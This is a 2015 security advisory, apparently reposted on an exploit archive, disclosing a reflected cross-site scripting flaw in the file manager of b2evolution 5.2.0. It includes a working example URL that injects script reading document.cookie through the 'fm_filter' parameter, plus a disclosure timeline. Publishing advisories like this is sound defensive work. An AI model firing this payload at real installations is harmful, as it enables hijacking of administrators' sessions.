CMS b2evolution 5.2.0 Cross Site Scripting

CMS b2evolution 5.2.0 Cross Site Scripting: Posted Jan 14, 2015; Authored by Steffen Roesemann; CMS b2evolution version 5.2.0 suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 4b95a602e4064b14c1925613d95f0cd6ab4878e0ce547bf1e2ca309b92c192e4; Download | Favorite | View

CMS b2evolution 5.2.0 Cross Site Scripting

Advisory: Reflecting XSS vulnerability in CMS filemanager of b2evolution v.
5.2.0
Advisory ID: SROEADV-2014-09
Author: Steffen Rösemann
Affected Software: CMS b2evolution v. 5.2.0 (Release-Date: 6th-Dec-2014)
Vendor URL: http://b2evolution.net/
Vendor Status: did not respond to issue
CVE-ID: -

==========================
Vulnerability Description:
==========================

The filemanager of b2evolution v. 5.2.0 is prone to reflecting XSS attacks.

==================
Technical Details:
==================

By appending aribitrary HTML- and/or JavaScriptcode to the "fm_filter"
parameter of the URL where the filemanager functionality of b2eveolution is
located, an attacker could trick an authenticated administrative user to
execute the code.

Filemanager is located here on a common b2evolution installation:

http://
{TARGET}/blogs/admin.php?fm_filter=&actionArray[filter]=Apply&ctrl=files&locale=&blog=1&mode=&ajax_request=0&root=collection_1&path=&fm_mode=&linkctrl=&linkdata=&iframe_name=&fm_hide_dirtree=0&fm_flatmode=&fm_order=&fm_orderasc=

Exploit-Example:

http://
{TARGET}/blogs/admin.php?fm_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&actionArray[filter]=Apply&ctrl=files&locale=&blog=1&mode=&ajax_request=0&root=collection_1&path=&fm_mode=&linkctrl=&linkdata=&iframe_name=&fm_hide_dirtree=0&fm_flatmode=&fm_order=&fm_orderasc=

=========
Solution:
=========

Vendor did not respond and submitted no solution.

====================
Disclosure Timeline:
====================

30-Dec-2014 – found the vulnerability
30-Dec-2014 - informed the developers (incl. announcement to release
technical details on 13th Jan 2015 if there is no response)
30-Dec-2014 – release date of this security advisory [without technical
details]
13-Jan-2015 - vendor did not respond
13-Jan-2015 - release date of this security advisory
13-Jan-2015 - send to lists



========
Credits:
========

Vulnerability found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] http://b2evolution.net/
[2] http://sroesemann.blogspot.de/2014/12/sroeadv-2014-09.html
[3]
http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2014-09.html

Top Authors In Last 30 Days

Red Hat 244 files
Ubuntu 86 files
Gentoo 31 files
Debian 17 files
tmrswrr 8 files
Sina Kheirkhah 7 files
indoushka 5 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
bRpsd 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,456)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,351)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,673)
UNIX (9,429)
UnixWare (187)
Windows (6,667)
Other

CMS b2evolution 5.2.0 Cross Site Scripting

CMS b2evolution 5.2.0 Cross Site Scripting

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

CMS b2evolution 5.2.0 Cross Site Scripting

Share This

CMS b2evolution 5.2.0 Cross Site Scripting

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems